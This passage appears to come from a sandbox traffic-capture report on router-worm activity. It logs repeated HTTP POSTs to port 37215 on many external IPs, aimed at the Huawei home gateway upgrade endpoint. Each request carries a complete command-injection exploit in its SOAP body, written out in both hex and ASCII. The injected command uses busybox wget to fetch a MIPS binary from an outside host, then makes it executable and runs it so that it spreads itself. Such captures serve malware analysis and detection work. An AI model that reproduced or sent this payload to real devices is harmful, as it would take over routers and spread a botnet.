                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          22192.168.2.155377645.248.203.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507059097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.154402241.171.138.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507067919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.1549192157.53.132.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507069111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.1560070197.153.35.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507071018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.153560041.127.71.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507077932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.1554326182.167.139.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507095098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.154637261.168.200.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507119894 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.1536618201.189.221.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507144928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.1558424157.101.105.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507196903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.1543198218.242.161.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507221937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
